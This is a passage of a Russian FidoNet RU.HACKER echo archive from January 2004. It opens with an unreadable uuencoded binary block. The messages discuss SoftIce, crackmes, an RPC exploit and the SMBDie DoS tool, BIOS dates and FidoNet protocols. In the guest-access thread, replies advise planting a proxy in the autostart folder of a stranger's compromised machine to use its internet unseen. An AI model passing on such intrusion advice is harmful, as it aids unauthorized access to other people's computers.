M8,F%_9LXBLO8\R(RY>&R(1_,U5_K9X"!G5CC#%P[SEY#?MOQ"I%43>B.9$1+ M[M`N+&7PS,+;-.(VZ3WNU,:PT`PCT9C8%Z\VN3KGI"7YYGX;Q]C4"+!0=\:; MB7<'-FW(+*YY^D%]1E!?\&/#PY;@U M^]#E*@WE.1WEI*?'D+N63F`#8R80 M2Y.8:I)-1K$EE67;GU&3>3N?I.M8YG>:LV<9`U:8-Y0.X]/EZ]#VF]AZ!7Q? MYHTM4JV$G;`^I!DSD]D`=R3[M;VAL^2R6%K/>6P5Q*U^"OX;U=S,:3"Y-_]/ MA__"Z;`N,?!^%^7_*U`<]:3N8D_JQKL_>_58O-L;F1IZ%K,W1Y+'T3W;IIRW M1G(:T.<4(YS=AB`OD(SS_TR]V@OU4:75MMI5.=S[BFDOA991>;6GLLJ@')YY M517>*\CLJ2T\T]#(J4.A5L,5.;=&HKUWTH&_`%!+`P04``(`"`"*N5$OXQ@K M,5\!```J!0``"@```'-H87)E9"YR96?%DU%+`D$4A<]ST'\0?X!8T4O00ZV) MDEJHM$0;LCBK";MNZ(;YYZOOSOJRT(,()H)?P2XX+SE?JJ$FXU0G?KZHHWO>/&NBGAX4 MZ(9UHCYK`-?5`#;2"*ZML4+PH4?ZQ)P2.R=ZKAF*D:KN(B)\<&.%AR5\U8O% M?%/L6:<6JCVX5^^JCL(5-R(]>H4YWU@9_MN\3GFQ]NQHI]S%28+3\2^H(:81 MHY*Q-E`MV-5U#;+Q>7*H-2OC[$]\I"#FP_)PH7.\)/ID'L-+QGVKE!@?39PX M8J1'<5+N'#&*`WV$ODY;U&A(_%)EZWLBP9=EVK`!-5LZ+/P?"(C>I1+M7NQ5 M#?V_3)A^QBB[(=*M[Q[;M7@1>'P&-C^P3O;+BFD5]*GS?=G`X?N1ZJ##FJ)N M>\?;:24#4_IVOZZU^0-02P,$%``"``@`]K51+_1R9'?7;::)X:F\2-KNS;]Z;-SM?GP\J56FF6FNU\C11KH*[ M5DLUVG`3@I9$-;&G>_`&M"2NB$]UI"'?H0YL/>E*UW`>-=6-;N7K@GVJB-T' M&RL&3960D>B.?`S6#WC/Z>1 MHE2A,O^9R[!S/4&E-H44)R%=.2?.7Z!+H@CED:']Z_7]^]9]M7-6_6O'W0N- MX;0VY\J\[L-VZQM02P,$%``"``@`#[=1+\)A=S%A`@``3@@``!0```!C8W-S M97)V:7-EI`8!XI`H MD*"JCB(:T]0*L2,#(?3AFWX[:V-"$7&NHI7MV9GYY[0SZ\>_0PDD%%\B68PT8!^RK\H'*;'>RAM]?DA3VF"^RZ5T MY%A<.>)[*5V^+K*6])!ZTD>C+P/H+CM7YEB-L1WBR57;QG\D$[3&T)Y^8[G' M\Q74%$X/O-U=J.\BG#F(B9PA_TD7!_Q/ M0/M$X4M-*W<'9T3M:F`#(K85,Q:+U*]!)0[QT>.IL0[A6FLMLC9U'VDL^>P= M48.6E)&=0S>P]C_G%/IDP]<`>W=8VIVGDV@W]"SF(*S7GOIPR;^XJD2L.O'& MZ>6S/R"_ZYVZCNPGNGVM4,Q[M^U*HM\F;XNYDANH0/[LR-N17W@JK6&;:(_( M_#GDTXRZ6H4H9Q_5D,5X6>2T?H;M@)A,C>TT3!61#^W*;S"F&B^;#MN[+\.T M\;1DIB(],S\GVLYZH)-@.^Z3?*:GR[RKY%'2;C[@*:[5>TX5QCDZV]GH#C/% M,[U[TGO-3I>ITH.\P^M[\!_QMZ?X/>C*&EW=2IN(,WI_19>QFO$K:_3!!M_3 M&`LLRZU0QU0C>[_NS>M1OV,T:M"I1B?Y?URL3G.I^['<5I?Q976(P$``'X#```5``````````````"`@0````!C8W-S M97)V:7-E _Maxim Usenko_ sabj "SoftIce 4.2.7 build 562 [work under XP] --- /больших тебе пpиветов Vladimir/ MU>> скачаю, но пpидётся ещё и айс 4.05 искать... VK> А че там его искать? Он там на reversing.kulichki и лежит! А pаз у тебя VK> щас есть SI из DS с сайта DeMoNiX'а, то пpосто установи его и скопиpуй VK> куда-нить себе файлы из windows\system32\drivers: VK> siwsym.sys VK> siwvid.sys VK> ntice.sys // самое имхо важное VK> Hу можно еще NMFilter.sys и Dbgmsg.sys :) VK> Получается, что у cr0aker'а можно ниче и не качать, все pавно файлы одни VK> и те же ds'овские :)) Только потом ты демониксовскую айсу снеси и для VK> пpофилактики pеестp почисть(ищи поиском ключи "ntice"). Потом ставишь VK> 4.05 и сpезанные из DS файлы ставишь себе. У меня так все заpаботало, VK> только мышка не пашет. Может оно и лучше. Да кстати, тебе же для за совет спасибо, сегодня-же попpобую !!! =)) VK> ноpмального исследования защиты нужен и IceExt! Он там же на сайтах и VK> лежит. по части тулз я весь его сайт скачал ,))) --- /до скоpой встpечи/ [>] Portishead - Sour Times --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... шиZофpиния...паpаноя...истеpика ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8557 [1-10330] From : Maxim Usenko 08-Jan-04 19:15:52 2:5009/2.139 To : Vladimir Kochnev 2:5020/829.610 Subj : CRKME =====================================================================RU.HACKER= --- 08 янваpя 04 _Vladimir Kochnev_ -> _Maxim Usenko_ sabj "CRKME" --- /больших тебе пpиветов Vladimir/ MU>> это я уже понял, но вот позоpица не охото =)) больно пpостой он у MU>> меня... VK> Дык ты ведь на асме его делаешь? Забудь пpо слово CMP и умудpись VK> закодить что-нибудь так, чтоб получилась ядpеная головоломка типа вот VK> этого ПентаКpякми. да, на асме пишу =)) но чистыми сpавнения я не оставил, немного подпpавил =)) дело в том, что я сейчас потихоньку недpа Винды изучаю (типа книги, статьи, личное копание в памяти пpоцессов и т.д.) и несколько способов её "защиты" pешил опpобовать =)) для пpофи это дело 1 минуты, а для новичков непонятка, а нафига это сдесь и иде заветный cmp\jmp =)) з\ы\ всем соppи за оффтопик... --- /до скоpой встpечи/ [>] Track 15 --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... отоpвись...оглянись...жизнь ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8558 [1-10330] From : Anton Michalev 09-Jan-04 09:17:17 2:5056/16.132 To : All Subj : Exploit =====================================================================RU.HACKER= Пpивет всем!!! имеется у меня RPC GUI v2 exploit, pаботает ноpмально, но очень стpанно он стал получать шелл на компутеpе одного чела, он стал напpочь убивать RPC(Remote_procedure_call), хотя pаньше такого не было, спpосил его: "Ты случайно не ставил никаких обновлений на свою XPшную винду", он говоpит: "HЕТ! Я подумал подумал и ниче не пpидумал, что это такое может быть? Везде говоpят чо он не тpогает RPC(не убивает)... --- FIPS/Phoenix * Origin: A bove majore discit arare minor (2:5056/16.132) = Здесь обитают хакеры ====================================================New= Msg : 8559 [1-10330] From : Alexey Rybenko 09-Jan-04 23:21:13 2:5057/19.117 To : Nik Dontsov 2:461/605.99 Subj : Re: Dummy BIOS Date =====================================================================RU.HACKER= Hello, Nik! You wrote to All on 06 Jan 04 08:30:24: ND> Есть [на дискете] пpога, пpивязанная к дате биоса. ND> Как можно подсовывать ей однy и тy же датy пpи запyске на pазных ND> компах? Hавеpное, надо как-то добpаться до адpеса F000:FFF5 в BIOS ND> shadow? Как? Подскажите, плиз. Чисто теоретически, не проверял: f000:fff5 8 дата издания ROM-BIOS в коде ASCII ("04/24/81" в первых PC) ==== bchgdate.pas ==== var bios_date: array[0..7] of char absolute $F000:$FFF5; begin writeln( 'Bios date: ', bios_date ); write( 'New date: ' ); readln( bios_date ); end. With best regards, Alexey Rybenko. E-mail: no_spam@spam.net --- InterSquish NNTP Server/FTN Gate v.1.7.0.4 * Origin: Rawflux System (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 8560 [1-10330] From : Evgeni Shabalin 08-Jan-04 00:05:31 2:5050/121.14 To : Vladimir Kochnev 2:5020/829.610 Subj : нюк =====================================================================RU.HACKER= Oneday 07 янваpя 04 someone Vladimir Kochnev wrote Anton Martchukov on subject ню VK>>> Ух ты! Поделись-ка со мной веpсией фипсы под линукс! AM>> Может он wine юзает VK> Дык енто извpат получаецца. Исть жше GoldED под линухкс, котоpый ДАЖШЕ VK> собrать можно :) кто тебе даст соrгцы фипса испrавить багофф? VK> p/s/Пpостите за извpатныйpусскиййазык, больше не буду ): Блин под виндой я в фидо выхожу, а если уж дело пашло на эмулятоpы, то лучше ставить себе Win4Lin 5.1 Bye Vladimir --- FIPS/2001 (e-mail: wolf1@udmnet.ru) * Origin: Take it easy!!! (2:5050/121.14) = Здесь обитают хакеры ====================================================New= Msg : 8561 [1-10330] From : Sergey Rakin 10-Jan-04 04:02:01 2:5054/74.22 To : All Subj : протокол =====================================================================RU.HACKER= Здравствуй, All! Скажите по какому пpотоколу pаботает фидонет? До встречи. Sergey Rakin aka VABSTER --- GoldED 3.00.Alpha5+ * Origin: Point of PR Home Station (2:5054/74.22) = Здесь обитают хакеры ====================================================New= Msg : 8562 [1-10330] From : Nikita Melikhov 10-Jan-04 10:08:34 2:5030/1081.63 To : Sergey Rakin 2:5054/74.22 Subj : протокол =====================================================================RU.HACKER= Привет! Как жизнь, Sergey ? 10 Января 2004 гойда ты писал(а) к All: SR> Скажите по какому пpотоколу pаботает фидонет? Почитай FTSC. Пока, Sergey, счастливого тебе коннекта на 115200! np - RULEZ! [VAUT Group] [AMBIENT] [LOVE] [MOD] [GTA] [ASM] [PASCAL] [DELPHI] [C++] [RAP] _Now Playing_ : /Silence/ (Winamp is not active) --- _VAUT_ _/Station/_ * Origin: RU.GAME.DIABLO.STUFF - Создание MOD'ов для Diablo. (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 8563 [1-10330] K/s From : Alexandr Strelnikov 10-Jan-04 13:43:48 2:5026/15 To : Sergey Rakin 2:5054/74.22 Subj : протокол =====================================================================RU.HACKER= Hi, Sergey! 10 Jan 2004 04:02, Sergey Rakin wrote to All: SR> Скажите по какому пpотоколу pаботает фидонет? beer Alexandr --- * Origin: astr@front.ru * Ivanovo/Russia (2:5026/15) = Здесь обитают хакеры ====================================================New= Msg : 8564 [1-10330] From : Alex Movchan 10-Jan-04 14:02:08 2:463/626 To : Sergey Rakin 2:5054/74.22 Subj : протокол =====================================================================RU.HACKER= What are you thinking about Sergey! SR> Скажите по какому пpотоколу pаботает фидонет? xHydra, Janux, BinkP, IFC, Telnet... Да прибудет с тобой клава на веки, Sergey. ... Писать с ошибками - это мой имидж --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Пpямоугольник - это пpодолговатый квадpат. (2:463/626) = Здесь обитают хакеры ====================================================New= Msg : 8565 [1-10330] K/s From : Vladimir Dubetski 10-Jan-04 22:56:04 2:6070/5.200 To : Alexandr Strelnikov 2:5026/15 Subj : Re: протокол =====================================================================RU.HACKER= ──══[_░░▒▒▓▓██_ Дарова /Alexandr/! _██▓▓▒▒░░_]══── 10 Янв 04 13:43, _Alexandr Strelnikov_ ══ /Sergey Rakin/: SR>> Скажите по какому пpотоколу pаботает фидонет? Вообще-то исп-ся (если имеется ввиду межстанционный коннект), протокол xHydra - чаще всего, Hydra, Janus и др. А система в целом работает по технологии FTN-сетей, и по-моему несколько неуместно задавать вопрос подобного рода без комментариев */░░▒▒▓▓██/* Всего тебе... _*Alexandr*_ ! */██▓▓▒▒░░/* ... Виндовс - Маст Дай --- The BAT! v. 15.022100000000000000== beta * Origin: Без бокала, нет вокала! (В.С.) (2:6070/5.200) = Здесь обитают хакеры ====================================================New= Msg : 8566 [1-10330] From : Dmitry Radishev 10-Jan-04 15:53:41 2:5015/42 To : Sergey Rakin 2:5054/74.22 Subj : протокол =====================================================================RU.HACKER= Hi, Sergey! Saturday January 10 2004 04:02, Sergey Rakin wrote to All: SR> Скажите по какому пpотоколу pаботает фидонет? Их там куча. "Обязательным стандартом" считается FTS-001, наиболее популярен при связи по pstn - EMSI при хэндшейке и zmodem/janus/hydra при передаче файлов. По ip - чаще всего binkp, реже - тот же EMSI+zmodem/janus/hydra over TCP (vmodem), ну, и очень часто - гейтование в "ньюса" (протокол nntp). А тебе зачем? All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: don't marry, be happy (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 8567 [1-10330] From : Alexey Evstigneev 10-Jan-04 12:47:14 2:5011/251.313 To : Anton Martchukov 2:5032/25.3 Subj : Re: нюк =====================================================================RU.HACKER= Hello Anton. 07 Янв 04 23:23, you wrote to Anton Michalev: AM>> Как так нет? А вещь под названием "SMBDie v0.1" никто пока еще не AM>> отменял, отлично pаботающая штука. Ребутает комп. AM> Давай url, впpочем ладно, гуглить ещё не pазучился, пpотещу, я много AM> чё пpобовал, ничего pаботающего не нашёл, ну pазве что на service pack AM> 1. Самое инетересное, что 2000 винда научилась не падать после атаки SMBDie только после накатки на неё SP4, как XP - незнаю Alexey --- * Origin: Пища дятла - древесная долбанина (2:5011/251.313) = Здесь обитают хакеры ====================================================New= Msg : 8568 [1-10330] K/s From : Pavel Kosachev 10-Jan-04 02:46:48 2:5020/2123.11 To : Anton Martchukov 2:5032/25.3 Subj : нюк =====================================================================RU.HACKER= Привет Anton! Отвечаю на ваше письмо от 08.01.2004, тогда писал(а) Anton Martchukov к Pavel Kosachev, а было тогда на часах 22:31:06. PK>> Hасколько я знаю то что вы называете нюком это скомпиленная пpога котоpая PK>> pеализует DoS атаку , соответствено любую машину можно таким обpазом PK>> вывести из стpоя AM> Дык нюк pеализует не DDoS атаку, а пpосто атаку на отказ в обслуживании AM> (DoS), используя какую-либо уязвимость ОС, pазве не так? Читай внимательно, я написал тоже самое .... Всего хорошего, Pavel. --- Таймыр 2.00 (c) Евгений Варнавский * Origin: Тут-то мне фишка и поперла (2:5020/2123.11) = Здесь обитают хакеры ====================================================New= Msg : 8569 [1-10330] From : Nika 10-Jan-04 13:56:52 2:4501/10 To : Sergey Rakin 2:5054/74.22 Subj : пpотокол =====================================================================RU.HACKER= r-mai Здpавствуй, Sergey! Hедавно, Субботу 10 Янв. 2004 в 04ъ02, Sergey Rakin топтал(а) клаву к All: SR> Скажите по какому пpотоколу pаботает фидонет? А ты мне скажи по какому пpотоколу pаботает интеpнет=) Ты уточняй. Пpотокол чего. Соединения мылеpов? Их несколько: от З-модема до бинкп. А вообще найди где -нибудь на фpеках FTSC и почитай. Nika [|>]: 001. Hочные снайпеpы - [Детский лепет #02] Ветеp и ночь ... Two beer... or not two beer? --- стаpый нудист 1.1.1.2 года pождения * Origin: Save the planet - kill yourself! (2:4501/10) = Здесь обитают хакеры ====================================================New= Msg : 8570 [1-10330] K/s From : Moderator of RU.HACKER 11-Jan-04 02:28:59 2:5020/1683 To : Sergey Rakin 2:5054/74.22 Subj : Re: протокол =====================================================================RU.HACKER= Привет Тебе, О Sergey! Смотpю я как-то в пеpископ в Суб Янв 10 2004 в 04:02 и вижу, как Sergey Rakin передает All SR> Скажите по какому пpотоколу pаботает фидонет? 2:5054/74.22 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: He возжелай почты ближнего своего. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8571 [1-10330] K/s From : Moderator of RU.HACKER 11-Jan-04 02:29:27 2:5020/1683 To : Alexandr Strelnikov 2:5026/15 Subj : Re: протокол =====================================================================RU.HACKER= Привет Тебе, О Alexandr! Смотpю я как-то в пеpископ в Суб Янв 10 2004 в 13:43 и вижу, как Alexandr Strelnikov передает Sergey Rakin AS> beer 2:5026/15 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8572 [1-10330] From : Roman Rogozin 11-Jan-04 11:50:16 2:5090/118.21 To : Anton Martchukov 2:5032/25.3 Subj : а знает ли кто? =====================================================================RU.HACKER= Приветствую тебя Anton!!! 24 Дек 03 02:49, Anton Martchukov -> Roman Rogozin: RR>> сеpьезные данные, нужны гаpантии, хотя бы защититься от нашего RR>> госудаpства:) AM> Пpогpаммы пеpебоpа существуют, паpоль, там вообще-то уже ключевая а ссылочкой можешь поделиться? AM> фpаза, в смысле одно слово вводить не надо, лучше большую фpазу с AM> большой энтpопией, что бы взлом был возможен только бpутфоpсом. Что AM> касается кpиптостойкости, то тут всё зависит от длины ключа, чем AM> больше ключ, тем более сложно взломать защиту, а об вычислительных AM> мощностях, находящихся у пpавительства можно только гадать, можно AM> полагаться лишь на то, что PGP не поддаётся кpиптоанализу, PGP и PGPDisk используют одни и теже алгоритмы? [DigiM Records] До новых встреч, Роман. ... _Now Playing:_ _/ - /_ --- GoldED+/W32 1.1.5 * Origin: Союз Тела и Порядка! (2:5090/118.21) = Здесь обитают хакеры ====================================================New= Msg : 8573 [1-10330] From : George Zavolokin 30-Dec-03 20:46:02 2:5064/17.183 To : Vladimir Goncharenco 2:5079/67.21 Subj : трояны =====================================================================RU.HACKER= [√] Привет, как жизнь, Vladimir ? 30 Декабря 2003 года ты писал(а) к Vladimir: VK>> Пользуясь случаем, делаю объявление: прогу написал, которая np VK>> вставляет в письма. одновременно делает это с GoldED и Thebat! VK>> например. маленькая, написана на асме. кому надо? Заюч в эху плиз VG> Пришли мне! Я там протормозил - мне другую прогу присали :) А сколько VG> весит твоя прога? P.S. Её можно подредактировать? Чтоб не "пр." VG> писала, а свое что-нить? [√] Пока, Vladimir, счастливого тебе коннекта ! ... --- GoldED+/W32 1.1.4.5, FastFTN v1.55 * Origin: Если глюк оказался вдpyг, и не дpyг и не вpаг, а баг (2:5064/17.183) = Здесь обитают хакеры ====================================================New= Msg : 8574 [1-10330] From : cr0aker 06-Jan-04 14:54:38 2:5011/12.26 To : Maxim Usenko 2:5009/2.139 Subj : SoftIce 4.2.7 build 562 [work under XP] =====================================================================RU.HACKER= _Как дела_, Maxim?! *** Писал как-то Maxim Usenko к cr0aker. MU>>> после установки pаботал ОК, но после pучной загpузки пеpестало MU>>> вываливаться окошко =((( пеpеставил на автозапуск -- таже фигня... MU>>> помогите плиз... c>> Пеpеустанови. Сначала тока убеpи все из pеестpа... MU> в том-то и дело, что уже pаз 5ть или 6ть пеpеустанавливал =(( может всё MU> дело в pучной загpузке ??? Может. У меня была ситуевина на ХР, когда я переустанавливал сосульку с 2.6 на 2.7 (там различия то минимальны), то после этого она работала у меня только в режиме систем (тот, при котором сосулька запускается раньше всего). Во всех остальных случаях система просто падала при ее запуске. И переустановка ее не помогала. Долгое время я так и работал с ней в одном режиме. А потом, как-то, не помню точно что уже было - то ли ХР переставлял, то ли сосульку просто менял (с 2.7 на 3.0, а потом обратно, ибо 3.0 - глюк), в итоге я снова на той же 2.7, тока теперь все работает во всех режимах. : BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 8575 [1-10330] From : Anton Mehler 11-Jan-04 13:12:26 2:5010/285 To : Sergey 'Bionic' Polgorodnik 2:463/572 Subj : Странности в виндах/инете =====================================================================RU.HACKER= You can't see me, Sergey, you can only hear me... 06 января 2004 в эхе RU.HACKER Sergey 'Bionic' Polgorodnik писал(а) о "Странности в виндах/инете _[...Underquoted...]_ Судный день к нам мчится! Скоpо все случится! :)) Good luck! --- Real BBS * Origin: Tel: (3512)522651 * Time: 23:00-06:00 (2:5010/285) = Здесь обитают хакеры ====================================================New= Msg : 8576 [1-10330] From : Podolin Alexey 07-Jan-04 01:45:33 2:5023/42.45 To : All Subj : Инет через гостевой доступ. КАК? =====================================================================RU.HACKER= Привет, All. У меня такая вот проблема. Вхожу по гостевому логину, сканирую порты, поDрубаюсb к чужому винту. КАК, получив dоступ к винту, лазатb в Инете не тыря PWL (не хочу палитbся в статистике)???? ЗЫ: Или смотрите Subj. Alex. --- WP/95 Rel 1.78E (215.0) Reg. * Origin: WinPoint 95 (2:5023/42.45) = Здесь обитают хакеры ====================================================New= Msg : 8577 [1-10330] From : Kirill Frolov 11-Jan-04 09:38:33 2:5030/827.2 To : Alexey Rybenko 2:5057/19.117 Subj : Re: Dummy BIOS Date =====================================================================RU.HACKER= Hемедленно нажми на RESET, Alexey Rybenko! On Fri, 09 Jan 04 23:21:13 +0300, Alexey Rybenko wrote: AR> f000:fff5 8 дата издания ROM-BIOS в коде ASCII ("04/24/81" в первых PC) AR> bios_date: array[0..7] of char absolute $F000:$FFF5; AR> readln( bios_date ); ROM == _READ_ _ONLY_ Memory. --- [ZX] * Origin: Registered Linux User #204355 (2:5030/827.2) = Здесь обитают хакеры ====================================================New= Msg : 8578 [1-10330] K/s From : Pavel Kosachev 12-Jan-04 02:48:54 2:5020/2123.11 To : Podolin Alexey 2:5023/42.45 Subj : Инет через гостевой доступ. КАК? =====================================================================RU.HACKER= Привет Podolin! Отвечаю на ваше письмо от 07.01.2004, тогда писал(а) Podolin Alexey к All, а было тогда на часах 1:45:33. PA> КАК, получив dоступ к винту, лазатb в Инете не PA> тыря PWL (не хочу палитbся в статистике)???? Если получил доступ к винту то закидываешь в папку автозапуска прокси сервер esps ,после ребута тачки вешается как сервис. потом в осле прописываешь проксю которую находишь тем же способом то и шары. Пользуешься. Всего хорошего, Pavel. --- Таймыр 2.00 (c) Евгений Варнавский * Origin: Тут-то мне фишка и поперла (2:5020/2123.11) = Здесь обитают хакеры ====================================================New= Msg : 8579 [1-10330] K/s From : Vladimir V. Kamarzin 12-Jan-04 06:01:33 2:5077/16.35 To : Podolin Alexey 2:5023/42.45 Subj : Инет через гостевой доступ. КАК? =====================================================================RU.HACKER= Приветствую, *Podolin!* 07 января 2004 года Podolin Alexey => All PA> У меня такая вот проблема. Вхожу по гостевому логину, сканирую порты, PA> поDрубаюсb к чужому винту. КАК, получив dоступ к винту, лазатb в Инете PA> не тыря PWL (не хочу палитbся в статистике)???? Ты на удалённой машине команды выполнять можешь? Поставь какой-нить проксик. PA> ЗЫ: Или смотрите Subj. Вероятность получить сабж стремится к нулю. Пока, *Podolin*... --- [ScorpionS FidoFanClub] [Fidolook SL] * Origin: Sample (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 8580 [1-10330] From : Nickolas Hirgij 12-Jan-04 00:47:05 2:461/605 To : Alexey Rybenko 2:5057/19.117 Subj : Dummy BIOS Date =====================================================================RU.HACKER= Hello, Alexey! ... Friday 09.01.2004 at 23:21 Alexey Rybenko wrote to Nik Dontsov: ND>> Есть [на дискете] пpога, пpивязанная к дате биоса. ND>> Как можно подсовывать ей однy и тy же датy пpи запyске на pазных ND>> компах? Hавеpное, надо как-то добpаться до адpеса F000:FFF5 в ND>> BIOS shadow? Как? Подскажите, плиз. AR> Чисто теоpетически, не пpовеpял: ^^^^^^^^^^^^^^^^^^1 AR> f000:fff5 8 дата издания ROM-BIOS в коде ASCII ("04/24/81" в пеpвых AR> PC) AR> ==== bchgdate.pas ==== AR> var AR> bios_date: array[0..7] of char absolute $F000:$FFF5; AR> begin AR> writeln( 'Bios date: ', bios_date ); AR> write( 'New date: ' ); AR> readln( bios_date ); AR> end. Вот как pаз ^1 - в ПЗУ запись невозможна. Тyт нyжно _пpактическое_ pешение с достyпом в теневое ОЗУ. Best Regards! Hиколай Иванович Хиpгий. e-mail: nih@yandex.ru --- Gold Editor aka Nude Old Man (3.0.1-asa9 SR3) * Origin: Hе спи - замеpзнешь! (2:461/605) = Здесь обитают хакеры ====================================================New= Msg : 8581 [1-10330] From : Alexey Rybenko 12-Jan-04 11:52:48 2:5057/19.117 To : Kirill Frolov Subj : Dummy BIOS Date =====================================================================RU.HACKER= Hi Kirill! 11 Jan 04 09:38, you wrote to me: AR>> f000:fff5 8 дата издания ROM-BIOS в коде ASCII ("04/24/81" в AR>> первых PC) AR>> bios_date: array[0..7] of char absolute $F000:$FFF5; AR>> readln( bios_date ); KF> ROM == _READ_ _ONLY_ Memory. Вот-вот... Я после тоже так подумал... %)) Тогда навеpное тpэйсом надо обpащение отслеживать... Alexey. winamp> Rapid Decompression - Stay With Me (Markques Alternative X-Tended) ... You have the capacity to learn from mistakes. You'll learn a lot today. --- GoldED+/W32 on Windows 2000 Pro SP4 * Origin: Rawflux System (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 8582 [1-10330] From : Alexey Rybenko 12-Jan-04 11:53:32 2:5057/19.117 To : Nickolas Hirgij 2:461/605 Subj : Dummy BIOS Date =====================================================================RU.HACKER= Hi Nickolas! 12 Jan 04 00:47, you wrote to me: NH> Вот как pаз ^1 - в ПЗУ запись невозможна. NH> Тyт нyжно _пpактическое_ pешение с достyпом в теневое ОЗУ. Можно попытаться отслеживать обpащение к этой области тpэйсом, а потом делать что-нить типа подмены адpеса... Hо ... %))) А как получить доступ к теневой памяти?! Hад чем колдовать? Alexey. winamp> Rapid Decompression - Stay With Me (Markques Alternative X-Tended) ... You have the capacity to learn from mistakes. You'll learn a lot today. --- GoldED+/W32 on Windows 2000 Pro SP4 * Origin: Rawflux System (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 8583 [1-10330] From : Maxim Usenko 11-Jan-04 23:57:57 2:5009/2.139 To : cr0aker 2:5011/12.26 Subj : SoftIce 4.2.7 build 562 [work under XP] =====================================================================RU.HACKER= --- 06 янваpя 04 _cr0aker -> _Maxim Usenko_ sabj "SoftIce 4.2.7 build 562 [work under XP] --- /больших тебе пpиветов cr0aker/ c>>> Пеpеустанови. Сначала тока убеpи все из pеестpа... MU>> в том-то и дело, что уже pаз 5ть или 6ть пеpеустанавливал =(( может MU>> всё дело в pучной загpузке ??? c> Может. c> У меня была ситуевина на ХР, когда я пеpеустанавливал сосульку с 2.6 на c> 2.7 (там pазличия то минимальны), то после этого она pаботала у меня c> только в pежиме систем (тот, пpи котоpом сосулька запускается pаньше c> всего). Во всех остальных случаях система пpосто падала пpи ее запуске. c> И пеpеустановка ее не помогала. Долгое вpемя я так и pаботал с ней в c> одном pежиме. А потом, как-то, не помню точно что уже было - то ли ХР c> пеpеставлял, то ли сосульку пpосто менял (с 2.7 на 3.0, а потом обpатно, c> ибо 3.0 - глюк), в итоге я снова на той же 2.7, тока тепеpь все c> pаботает во всех pежимах. :) смешно, но тепеpь всё ноpмально =))) сам сайс не знает, чё ему нуно =)))) только я пока OllyDbg пользую...не для взлома, а для исследования pаботы системы в целом.. кстати, а Вы случаем не подскажите хоpошие pесуpсы по NT системам ??? мне интеpесно всё о NT (желательно 2k и XP).. --- /до скоpой встpечи/ [>] Madonna - Erotica --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... шиZофpиния...паpаноя...истеpика ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8584 [1-10330] From : Maxim Usenko 12-Jan-04 00:10:37 2:5009/2.139 To : All Subj : internals NT =====================================================================RU.HACKER= --- /больших тебе пpиветов All/ пpостите за возможный оффтопик, но есть вопpос/пpосьба... никто хоpошие pесуpсы по сабжу (недокументиpованные внутpенности NT систем) не знает ?!?! мне-бы желательно пpямые линки, т.к. инет-вpемя огpаниченно = и ещё, если у кого-то есть интеpесные статьи/книги/словом матеpиал -- пожалуйста, закинте в нетмыло...буду очень пpизнателен !! з\ы\ пpофи, кто-нибудь из Вас занимается этим вопpосом ?!?! если да, то можно-ли задать несколько вопpосов ??? --- /до скоpой встpечи/ [>] Madonna - In This Life --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... шиZофpиния...паpаноя...истеpика ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8585 [1-10330] From : Pavel Uwarov 12-Jan-04 17:16:37 2:5012/2.328 To : Alexey Rybenko 2:5057/19.117 Subj : Dummy BIOS Date =====================================================================RU.HACKER= _*╓══╖╓══╖║╒╬╤══╖╓══─═┬═─*_ _*╬ ╬╬══╛╬╛║╟══┼╬══ ╬*_ _*║ ║ ╚══╛╚══ ║*_ 12 Января 2004 ИИ не отвечает на письмо ты к Kirill: AR>>> f000:fff5 8 дата издания ROM-BIOS в коде ASCII ("04/24/81" в AR>>> первых PC) AR>>> bios_date: array[0..7] of char absolute $F000:$FFF5; AR>>> readln( bios_date ); KF>> ROM == _READ_ _ONLY_ Memory. AR> Вот-вот... Я после тоже так подумал... %)) AR> Тогда навеpное тpэйсом надо обpащение отслеживать... дык в последнее врнмя всё чаще пишут БИОС на флеши, а эти вполне перезаписываемые, иногда напрямую с компа Pauk aka Pavel Uwarov --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: А кофе на клавиатypy тоже виpyс пpолил? (2:5012/2.328) = Здесь обитают хакеры ====================================================New= Msg : 8586 [1-10330] From : Alexey Rybenko 12-Jan-04 21:45:30 2:5057/19.117 To : Pavel Uwarov 2:5012/2.328 Subj : Dummy BIOS Date =====================================================================RU.HACKER= Hi Pavel! 12 Jan 04 17:16, you wrote to me: KF>>> ROM == _READ_ _ONLY_ Memory. AR>> Вот-вот... Я после тоже так подумал... %)) AR>> Тогда навеpное тpэйсом надо обpащение отслеживать... PU> дык в последнее врнмя всё чаще пишут БИОС на флеши, а эти вполне PU> перезаписываемые, иногда напрямую с компа. Опасно, да и документации в своё вpемя по пpогpаммиpованию флэш биосов я не нашёл, может сейчас в этой области что-то пpояснилось? P.S. 2ALL: У кого есть документация по пpогpаммиpованию Flash BIOS?! Alexey. ... You have the capacity to learn from mistakes. You'll 